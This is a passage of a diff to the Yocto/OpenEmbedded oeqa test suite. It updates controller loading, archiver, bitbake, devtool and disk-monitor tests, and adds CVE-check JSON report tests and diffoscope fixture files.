154 raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module) 154 raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module)
155 155
156 extpath = target_modules_path.split(':') 156 for p in sys.path:
157 for p in extpath: 157 controllerpath = os.path.join(p, 'oeqa', 'controllers')
158 controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers')
159 if os.path.exists(controllerpath): 158 if os.path.exists(controllerpath):
160 add_controller_list(controllerpath) 159 add_controller_list(controllerpath)
161 return controllerslist 160 return controllerslist
@@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
175 # Search for and return a controller or None from given module name 174 # Search for and return a controller or None from given module name
176 @staticmethod 175 @staticmethod
177 def _loadControllerFromModule(target, modulename): 176 def _loadControllerFromModule(target, modulename):
178 obj = None
179 # import module, allowing it to raise import exception
180 module = __import__(modulename, globals(), locals(), [target])
181 # look for target class in the module, catching any exceptions as it
182 # is valid that a module may not have the target class.
183 try: 177 try:
184 obj = getattr(module, target) 178 import importlib
185 except: 179 module = importlib.import_module(modulename)
186 obj = None 180 return getattr(module, target)
187 return obj 181 except AttributeError:
182 return None
188 183
189 @staticmethod 184 @staticmethod
190 def readPackagesManifest(manifest): 185 def readPackagesManifest(manifest):
diff --git a/meta/lib/oeqa/sdk/cases/buildepoxy.py b/meta/lib/oeqa/sdk/cases/buildepoxy.py
index 385f8ccca8..f69f720cd6 100644
--- a/meta/lib/oeqa/sdk/cases/buildepoxy.py
+++ b/meta/lib/oeqa/sdk/cases/buildepoxy.py
@@ -17,7 +17,7 @@ class EpoxyTest(OESDKTestCase):
17 """ 17 """
18 def setUp(self): 18 def setUp(self):
19 if not (self.tc.hasHostPackage("nativesdk-meson")): 19 if not (self.tc.hasHostPackage("nativesdk-meson")):
20 raise unittest.SkipTest("GalculatorTest class: SDK doesn't contain Meson") 20 raise unittest.SkipTest("EpoxyTest class: SDK doesn't contain Meson")
21 21
22 def test_epoxy(self): 22 def test_epoxy(self):
23 with tempfile.TemporaryDirectory(prefix="epoxy", dir=self.tc.sdk_dir) as testdir: 23 with tempfile.TemporaryDirectory(prefix="epoxy", dir=self.tc.sdk_dir) as testdir:
diff --git a/meta/lib/oeqa/selftest/cases/archiver.py b/meta/lib/oeqa/selftest/cases/archiver.py
index bc5447d2a3..6a5c8ec71e 100644
--- a/meta/lib/oeqa/selftest/cases/archiver.py
+++ b/meta/lib/oeqa/selftest/cases/archiver.py
@@ -35,11 +35,11 @@ class Archiver(OESelftestTestCase):
35 src_path = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['TARGET_SYS']) 35 src_path = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['TARGET_SYS'])
36 36
37 # Check that include_recipe was included 37 # Check that include_recipe was included
38 included_present = len(glob.glob(src_path + '/%s-*' % include_recipe)) 38 included_present = len(glob.glob(src_path + '/%s-*/*' % include_recipe))
39 self.assertTrue(included_present, 'Recipe %s was not included.' % include_recipe) 39 self.assertTrue(included_present, 'Recipe %s was not included.' % include_recipe)
40 40
41 # Check that exclude_recipe was excluded 41 # Check that exclude_recipe was excluded
42 excluded_present = len(glob.glob(src_path + '/%s-*' % exclude_recipe)) 42 excluded_present = len(glob.glob(src_path + '/%s-*/*' % exclude_recipe))
43 self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % exclude_recipe) 43 self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % exclude_recipe)
44 44
45 def test_archiver_filters_by_type(self): 45 def test_archiver_filters_by_type(self):
@@ -67,11 +67,11 @@ class Archiver(OESelftestTestCase):
67 src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS']) 67 src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
68 68
69 # Check that target_recipe was included 69 # Check that target_recipe was included
70 included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipe)) 70 included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipe))
71 self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipe) 71 self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipe)
72 72
73 # Check that native_recipe was excluded 73 # Check that native_recipe was excluded
74 excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipe)) 74 excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipe))
75 self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipe) 75 self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipe)
76 76
77 def test_archiver_filters_by_type_and_name(self): 77 def test_archiver_filters_by_type_and_name(self):
@@ -104,17 +104,17 @@ class Archiver(OESelftestTestCase):
104 src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS']) 104 src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
105 105
106 # Check that target_recipe[0] and native_recipes[1] were included 106 # Check that target_recipe[0] and native_recipes[1] were included
107 included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[0])) 107 included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[0]))
108 self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipes[0]) 108 self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipes[0])
109 109
110 included_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[1])) 110 included_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[1]))
111 self.assertTrue(included_present, 'Recipe %s was not included.' % native_recipes[1]) 111 self.assertTrue(included_present, 'Recipe %s was not included.' % native_recipes[1])
112 112
113 # Check that native_recipes[0] and target_recipes[1] were excluded 113 # Check that native_recipes[0] and target_recipes[1] were excluded
114 excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[0])) 114 excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[0]))
115 self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipes[0]) 115 self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipes[0])
116 116
117 excluded_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[1])) 117 excluded_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[1]))
118 self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % target_recipes[1]) 118 self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % target_recipes[1])
119 119
120 120
diff --git a/meta/lib/oeqa/selftest/cases/bblayers.py b/meta/lib/oeqa/selftest/cases/bblayers.py
index f131d9856c..7d74833f61 100644
--- a/meta/lib/oeqa/selftest/cases/bblayers.py
+++ b/meta/lib/oeqa/selftest/cases/bblayers.py
@@ -12,6 +12,11 @@ from oeqa.selftest.case import OESelftestTestCase
12 12
13class BitbakeLayers(OESelftestTestCase): 13class BitbakeLayers(OESelftestTestCase):
14 14
15 def test_bitbakelayers_layerindexshowdepends(self):
16 result = runCmd('bitbake-layers layerindex-show-depends meta-poky')
17 find_in_contents = re.search("openembedded-core", result.output)
18 self.assertTrue(find_in_contents, msg = "openembedded-core should have been listed at this step. bitbake-layers layerindex-show-depends meta-poky output: %s" % result.output)
19
15 def test_bitbakelayers_showcrossdepends(self): 20 def test_bitbakelayers_showcrossdepends(self):
16 result = runCmd('bitbake-layers show-cross-depends') 21 result = runCmd('bitbake-layers show-cross-depends')
17 self.assertIn('aspell', result.output) 22 self.assertIn('aspell', result.output)
diff --git a/meta/lib/oeqa/selftest/cases/bbtests.py b/meta/lib/oeqa/selftest/cases/bbtests.py
index dc423ec439..0b88316950 100644
--- a/meta/lib/oeqa/selftest/cases/bbtests.py
+++ b/meta/lib/oeqa/selftest/cases/bbtests.py
@@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\"
148 self.delete_recipeinc('man-db') 148 self.delete_recipeinc('man-db')
149 self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output) 149 self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output)
150 self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output) 150 self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output)
151 line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.')
152 self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \
153doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output)
154 151
155 def test_rename_downloaded_file(self): 152 def test_rename_downloaded_file(self):
156 # TODO unique dldir instead of using cleanall 153 # TODO unique dldir instead of using cleanall
@@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
160""") 157""")
161 self.track_for_cleanup(os.path.join(self.builddir, "download-selftest")) 158 self.track_for_cleanup(os.path.join(self.builddir, "download-selftest"))
162 159
163 data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"' 160 data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
164 self.write_recipeinc('aspell', data) 161 self.write_recipeinc('aspell', data)
165 result = bitbake('-f -c fetch aspell', ignore_status=True) 162 result = bitbake('-f -c fetch aspell', ignore_status=True)
166 self.delete_recipeinc('aspell') 163 self.delete_recipeinc('aspell')
@@ -188,6 +185,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
188 self.assertTrue(find, "No version returned for searched recipe. bitbake output: %s" % result.output) 185 self.assertTrue(find, "No version returned for searched recipe. bitbake output: %s" % result.output)
189 186
190 def test_prefile(self): 187 def test_prefile(self):
188 # Test when the prefile does not exist
189 result = runCmd('bitbake -r conf/prefile.conf', ignore_status=True)
190 self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified prefile didn't exist: %s" % result.output)
191 # Test when the prefile exists
191 preconf = os.path.join(self.builddir, 'conf/prefile.conf') 192 preconf = os.path.join(self.builddir, 'conf/prefile.conf')
192 self.track_for_cleanup(preconf) 193 self.track_for_cleanup(preconf)
193 ftools.write_file(preconf ,"TEST_PREFILE=\"prefile\"") 194 ftools.write_file(preconf ,"TEST_PREFILE=\"prefile\"")
@@ -198,6 +199,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
198 self.assertIn('localconf', result.output) 199 self.assertIn('localconf', result.output)
199 200
200 def test_postfile(self): 201 def test_postfile(self):
202 # Test when the postfile does not exist
203 result = runCmd('bitbake -R conf/postfile.conf', ignore_status=True)
204 self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified postfile didn't exist: %s" % result.output)
205 # Test when the postfile exists
201 postconf = os.path.join(self.builddir, 'conf/postfile.conf') 206 postconf = os.path.join(self.builddir, 'conf/postfile.conf')
202 self.track_for_cleanup(postconf) 207 self.track_for_cleanup(postconf)
203 ftools.write_file(postconf , "TEST_POSTFILE=\"postfile\"") 208 ftools.write_file(postconf , "TEST_POSTFILE=\"postfile\"")
diff --git a/meta/lib/oeqa/selftest/cases/buildoptions.py b/meta/lib/oeqa/selftest/cases/buildoptions.py
index e91f0bd18f..b1b9ea7e55 100644
--- a/meta/lib/oeqa/selftest/cases/buildoptions.py
+++ b/meta/lib/oeqa/selftest/cases/buildoptions.py
@@ -57,15 +57,15 @@ class ImageOptionsTests(OESelftestTestCase):
57class DiskMonTest(OESelftestTestCase): 57class DiskMonTest(OESelftestTestCase):
58 58
59 def test_stoptask_behavior(self): 59 def test_stoptask_behavior(self):
60 self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"') 60 self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
61 res = bitbake("delay -c delay", ignore_status = True) 61 res = bitbake("delay -c delay", ignore_status = True)
62 self.assertTrue('ERROR: No new tasks can be executed since the disk space monitor action is "STOPTASKS"!' in res.output, msg = "Tasks should have stopped. Disk monitor is set to STOPTASK: %s" % res.output) 62 self.assertTrue('ERROR: No new tasks can be executed since the disk space monitor action is "STOPTASKS"!' in res.output, msg = "Tasks should have stopped. Disk monitor is set to STOPTASK: %s" % res.output)
63 self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output)) 63 self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
64 self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"') 64 self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
65 res = bitbake("delay -c delay", ignore_status = True) 65 res = bitbake("delay -c delay", ignore_status = True)
66 self.assertTrue('ERROR: Immediately abort since the disk space monitor action is "ABORT"!' in res.output, "Tasks should have been aborted immediatelly. Disk monitor is set to ABORT: %s" % res.output) 66 self.assertTrue('ERROR: Immediately abort since the disk space monitor action is "ABORT"!' in res.output, "Tasks should have been aborted immediatelly. Disk monitor is set to ABORT: %s" % res.output)
67 self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output)) 67 self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
68 self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"') 68 self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
69 res = bitbake("delay -c delay") 69 res = bitbake("delay -c delay")
70 self.assertTrue('WARNING: The free space' in res.output, msg = "A warning should have been displayed for disk monitor is set to WARN: %s" %res.output) 70 self.assertTrue('WARNING: The free space' in res.output, msg = "A warning should have been displayed for disk monitor is set to WARN: %s" %res.output)
71 71
diff --git a/meta/lib/oeqa/selftest/cases/cve_check.py b/meta/lib/oeqa/selftest/cases/cve_check.py
index 3f343a2841..22ffeffd29 100644
--- a/meta/lib/oeqa/selftest/cases/cve_check.py
+++ b/meta/lib/oeqa/selftest/cases/cve_check.py
@@ -1,9 +1,13 @@
1from oe.cve_check import Version 1import json
2import os
2from oeqa.selftest.case import OESelftestTestCase 3from oeqa.selftest.case import OESelftestTestCase
4from oeqa.utils.commands import bitbake, get_bb_vars
3 5
4class CVECheck(OESelftestTestCase): 6class CVECheck(OESelftestTestCase):
5 7
6 def test_version_compare(self): 8 def test_version_compare(self):
9 from oe.cve_check import Version
10
7 result = Version("100") > Version("99") 11 result = Version("100") > Version("99")
8 self.assertTrue( result, msg="Failed to compare version '100' > '99'") 12 self.assertTrue( result, msg="Failed to compare version '100' > '99'")
9 result = Version("2.3.1") > Version("2.2.3") 13 result = Version("2.3.1") > Version("2.2.3")
@@ -34,3 +38,183 @@ class CVECheck(OESelftestTestCase):
34 self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' < '1.0r'") 38 self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' < '1.0r'")
35 result = Version("1.0b","alphabetical") > Version("1.0","alphabetical") 39 result = Version("1.0b","alphabetical") > Version("1.0","alphabetical")
36 self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' > '1.0'") 40 self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' > '1.0'")
41
42 # consider the trailing "p" and "patch" as patched released when comparing
43 result = Version("1.0","patch") < Version("1.0p1","patch")
44 self.assertTrue( result ,msg="Failed to compare version with suffix '1.0' < '1.0p1'")
45 result = Version("1.0p2","patch") > Version("1.0p1","patch")
46 self.assertTrue( result ,msg="Failed to compare version with suffix '1.0p2' > '1.0p1'")
47 result = Version("1.0_patch2","patch") < Version("1.0_patch3","patch")
48 self.assertTrue( result ,msg="Failed to compare version with suffix '1.0_patch2' < '1.0_patch3'")
49
50
51 def test_convert_cve_version(self):
52 from oe.cve_check import convert_cve_version
53
54 # Default format
55 self.assertEqual(convert_cve_version("8.3"), "8.3")
56 self.assertEqual(convert_cve_version(""), "")
57
58 # OpenSSL format version
59 self.assertEqual(convert_cve_version("1.1.1t"), "1.1.1t")
60
61 # OpenSSH format
62 self.assertEqual(convert_cve_version("8.3_p1"), "8.3p1")
63 self.assertEqual(convert_cve_version("8.3_p22"), "8.3p22")
64
65 # Linux kernel format
66 self.assertEqual(convert_cve_version("6.2_rc8"), "6.2-rc8")
67 self.assertEqual(convert_cve_version("6.2_rc31"), "6.2-rc31")
68
69
70 def test_recipe_report_json(self):
71 config = """
72INHERIT += "cve-check"
73CVE_CHECK_FORMAT_JSON = "1"
74"""
75 self.write_config(config)
76
77 vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
78 summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
79 recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
80
81 try:
82 os.remove(summary_json)
83 os.remove(recipe_json)
84 except FileNotFoundError:
85 pass
86
87 bitbake("m4-native -c cve_check")
88
89 def check_m4_json(filename):
90 with open(filename) as f:
91 report = json.load(f)
92 self.assertEqual(report["version"], "1")
93 self.assertEqual(len(report["package"]), 1)
94 package = report["package"][0]
95 self.assertEqual(package["name"], "m4-native")
96 found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
97 self.assertIn("CVE-2008-1687", found_cves)
98 self.assertEqual(found_cves["CVE-2008-1687"], "Patched")
99
100 self.assertExists(summary_json)
101 check_m4_json(summary_json)
102 self.assertExists(recipe_json)
103 check_m4_json(recipe_json)
104
105
106 def test_image_json(self):
107 config = """
108INHERIT += "cve-check"
109CVE_CHECK_FORMAT_JSON = "1"
110"""
111 self.write_config(config)
112
113 vars = get_bb_vars(["CVE_CHECK_DIR", "CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
114 report_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
115 print(report_json)
116 try:
117 os.remove(report_json)
118 except FileNotFoundError:
119 pass
120
121 bitbake("core-image-minimal-initramfs")
122 self.assertExists(report_json)
123
124 # Check that the summary report lists at least one package
125 with open(report_json) as f:
126 report = json.load(f)
127 self.assertEqual(report["version"], "1")
128 self.assertGreater(len(report["package"]), 1)
129
130 # Check that a random recipe wrote a recipe report to deploy/cve/
131 recipename = report["package"][0]["name"]
132 recipe_report = os.path.join(vars["CVE_CHECK_DIR"], recipename + "_cve.json")
133 self.assertExists(recipe_report)
134 with open(recipe_report) as f:
135 report = json.load(f)
136 self.assertEqual(report["version"], "1")
137 self.assertEqual(len(report["package"]), 1)
138 self.assertEqual(report["package"][0]["name"], recipename)
139
140
141 def test_recipe_report_json_unpatched(self):
142 config = """
143INHERIT += "cve-check"
144CVE_CHECK_FORMAT_JSON = "1"
145CVE_CHECK_REPORT_PATCHED = "0"
146"""
147 self.write_config(config)
148
149 vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
150 summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
151 recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
152
153 try:
154 os.remove(summary_json)
155 os.remove(recipe_json)
156 except FileNotFoundError:
157 pass
158
159 bitbake("m4-native -c cve_check")
160
161 def check_m4_json(filename):
162 with open(filename) as f:
163 report = json.load(f)
164 self.assertEqual(report["version"], "1")
165 self.assertEqual(len(report["package"]), 1)
166 package = report["package"][0]
167 self.assertEqual(package["name"], "m4-native")
168 #m4 had only Patched CVEs, so the issues array will be empty
169 self.assertEqual(package["issue"], [])
170
171 self.assertExists(summary_json)
172 check_m4_json(summary_json)
173 self.assertExists(recipe_json)
174 check_m4_json(recipe_json)
175
176
177 def test_recipe_report_json_ignored(self):
178 config = """
179INHERIT += "cve-check"
180CVE_CHECK_FORMAT_JSON = "1"
181CVE_CHECK_REPORT_PATCHED = "1"
182"""
183 self.write_config(config)
184
185 vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
186 summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
187 recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "logrotate_cve.json")
188
189 try:
190 os.remove(summary_json)
191 os.remove(recipe_json)
192 except FileNotFoundError:
193 pass
194
195 bitbake("logrotate -c cve_check")
196
197 def check_m4_json(filename):
198 with open(filename) as f:
199 report = json.load(f)
200 self.assertEqual(report["version"], "1")
201 self.assertEqual(len(report["package"]), 1)
202 package = report["package"][0]
203 self.assertEqual(package["name"], "logrotate")
204 found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
205 # m4 CVE should not be in logrotate
206 self.assertNotIn("CVE-2008-1687", found_cves)
207 # logrotate has both Patched and Ignored CVEs
208 self.assertIn("CVE-2011-1098", found_cves)
209 self.assertEqual(found_cves["CVE-2011-1098"], "Patched")
210 self.assertIn("CVE-2011-1548", found_cves)
211 self.assertEqual(found_cves["CVE-2011-1548"], "Ignored")
212 self.assertIn("CVE-2011-1549", found_cves)
213 self.assertEqual(found_cves["CVE-2011-1549"], "Ignored")
214 self.assertIn("CVE-2011-1550", found_cves)
215 self.assertEqual(found_cves["CVE-2011-1550"], "Ignored")
216
217 self.assertExists(summary_json)
218 check_m4_json(summary_json)
219 self.assertExists(recipe_json)
220 check_m4_json(recipe_json)
diff --git a/meta/lib/oeqa/selftest/cases/devtool.py b/meta/lib/oeqa/selftest/cases/devtool.py
index 0985434238..9efe342a0d 100644
--- a/meta/lib/oeqa/selftest/cases/devtool.py
+++ b/meta/lib/oeqa/selftest/cases/devtool.py
@@ -8,6 +8,7 @@ import shutil
8import tempfile 8import tempfile
9import glob 9import glob
10import fnmatch 10import fnmatch
11import unittest
11 12
12import oeqa.utils.ftools as ftools 13import oeqa.utils.ftools as ftools
13from oeqa.selftest.case import OESelftestTestCase 14from oeqa.selftest.case import OESelftestTestCase
@@ -38,6 +39,13 @@ def setUpModule():
38 canonical_layerpath = os.path.realpath(canonical_layerpath) + '/' 39 canonical_layerpath = os.path.realpath(canonical_layerpath) + '/'
39 edited_layers.append(layerpath) 40 edited_layers.append(layerpath)
40 oldmetapath = os.path.realpath(layerpath) 41 oldmetapath = os.path.realpath(layerpath)
42
43 # when downloading poky from tar.gz some tests will be skipped (BUG 12389)
44 try:
45 runCmd('git rev-parse --is-inside-work-tree', cwd=canonical_layerpath)
46 except:
47 raise unittest.SkipTest("devtool tests require folder to be a git repo")
48
41 result = runCmd('git rev-parse --show-toplevel', cwd=canonical_layerpath) 49 result = runCmd('git rev-parse --show-toplevel', cwd=canonical_layerpath)
42 oldreporoot = result.output.rstrip() 50 oldreporoot = result.output.rstrip()
43 newmetapath = os.path.join(corecopydir, os.path.relpath(oldmetapath, oldreporoot)) 51 newmetapath = os.path.join(corecopydir, os.path.relpath(oldmetapath, oldreporoot))
@@ -340,7 +348,7 @@ class DevtoolAddTests(DevtoolBase):
340 checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263' 348 checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263'
341 checkvars['S'] = '${WORKDIR}/git' 349 checkvars['S'] = '${WORKDIR}/git'
342 checkvars['PV'] = '0.1+git${SRCPV}' 350 checkvars['PV'] = '0.1+git${SRCPV}'
343 checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https' 351 checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master'
344 checkvars['SRCREV'] = srcrev 352 checkvars['SRCREV'] = srcrev
345 checkvars['DEPENDS'] = set(['dbus']) 353 checkvars['DEPENDS'] = set(['dbus'])
346 self._test_recipe_contents(recipefile, checkvars, []) 354 self._test_recipe_contents(recipefile, checkvars, [])
@@ -442,6 +450,7 @@ class DevtoolAddTests(DevtoolBase):
442 tempdir = tempfile.mkdtemp(prefix='devtoolqa') 450 tempdir = tempfile.mkdtemp(prefix='devtoolqa')
443 self.track_for_cleanup(tempdir) 451 self.track_for_cleanup(tempdir)
444 url = 'gitsm://git.yoctoproject.org/mraa' 452 url = 'gitsm://git.yoctoproject.org/mraa'
453 url_branch = '%s;branch=master' % url
445 checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d' 454 checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d'
446 testrecipe = 'mraa' 455 testrecipe = 'mraa'
447 srcdir = os.path.join(tempdir, testrecipe) 456 srcdir = os.path.join(tempdir, testrecipe)
@@ -462,7 +471,7 @@ class DevtoolAddTests(DevtoolBase):
462 checkvars = {} 471 checkvars = {}
463 checkvars['S'] = '${WORKDIR}/git' 472 checkvars['S'] = '${WORKDIR}/git'
464 checkvars['PV'] = '1.0+git${SRCPV}' 473 checkvars['PV'] = '1.0+git${SRCPV}'
465 checkvars['SRC_URI'] = url 474 checkvars['SRC_URI'] = url_branch
466 checkvars['SRCREV'] = '${AUTOREV}' 475 checkvars['SRCREV'] = '${AUTOREV}'
467 self._test_recipe_contents(recipefile, checkvars, []) 476 self._test_recipe_contents(recipefile, checkvars, [])
468 # Try with revision and version specified 477 # Try with revision and version specified
@@ -481,7 +490,7 @@ class DevtoolAddTests(DevtoolBase):
481 checkvars = {} 490 checkvars = {}
482 checkvars['S'] = '${WORKDIR}/git' 491 checkvars['S'] = '${WORKDIR}/git'
483 checkvars['PV'] = '1.5+git${SRCPV}' 492 checkvars['PV'] = '1.5+git${SRCPV}'
484 checkvars['SRC_URI'] = url 493 checkvars['SRC_URI'] = url_branch
485 checkvars['SRCREV'] = checkrev 494 checkvars['SRCREV'] = checkrev
486 self._test_recipe_contents(recipefile, checkvars, []) 495 self._test_recipe_contents(recipefile, checkvars, [])
487 496
@@ -880,7 +889,7 @@ class DevtoolUpdateTests(DevtoolBase):
880 self._check_repo_status(os.path.dirname(recipefile), expected_status) 889 self._check_repo_status(os.path.dirname(recipefile), expected_status)
881 890
882 result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile)) 891 result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile))
883 addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"'] 892 addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"']
884 srcurilines = src_uri.split() 893 srcurilines = src_uri.split()
885 srcurilines[0] = 'SRC_URI = "' + srcurilines[0] 894 srcurilines[0] = 'SRC_URI = "' + srcurilines[0]
886 srcurilines.append('"') 895 srcurilines.append('"')
@@ -1322,7 +1331,7 @@ class DevtoolExtractTests(DevtoolBase):
1322 # Now really test deploy-target 1331 # Now really test deploy-target
1323 result = runCmd('devtool deploy-target -c %s root@%s' % (testrecipe, qemu.ip)) 1332 result = runCmd('devtool deploy-target -c %s root@%s' % (testrecipe, qemu.ip))
1324 # Run a test command to see if it was installed properly 1333 # Run a test command to see if it was installed properly
1325 sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no' 1334 sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o HostKeyAlgorithms=+ssh-rsa'
1326 result = runCmd('ssh %s root@%s %s' % (sshargs, qemu.ip, testcommand)) 1335 result = runCmd('ssh %s root@%s %s' % (sshargs, qemu.ip, testcommand))
1327 # Check if it deployed all of the files with the right ownership/perms 1336 # Check if it deployed all of the files with the right ownership/perms
1328 # First look on the host - need to do this under pseudo to get the correct ownership/perms 1337 # First look on the host - need to do this under pseudo to get the correct ownership/perms
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
new file mode 100644
index 0000000000..f70f10e4db
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
@@ -0,0 +1 @@
A
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
new file mode 100644
index 0000000000..223b7836fb
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
@@ -0,0 +1 @@
B
diff --git a/meta/lib/oeqa/selftest/cases/distrodata.py b/meta/lib/oeqa/selftest/cases/distrodata.py
index e1cfc3b621..8e5e24db3d 100644
--- a/meta/lib/oeqa/selftest/cases/distrodata.py
+++ b/meta/lib/oeqa/selftest/cases/distrodata.py
@@ -63,7 +63,7 @@ but their recipes claim otherwise by setting UPSTREAM_VERSION_UNKNOWN. Please re
63 return True 63 return True
64 return False 64 return False
65 65
66 feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\n' 66 feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\nPACKAGE_CLASSES = "package_ipk package_deb package_rpm"\n'
67 self.write_config(feature) 67 self.write_config(feature)
68 68
69 with bb.tinfoil.Tinfoil() as tinfoil: 69 with bb.tinfoil.Tinfoil() as tinfoil:
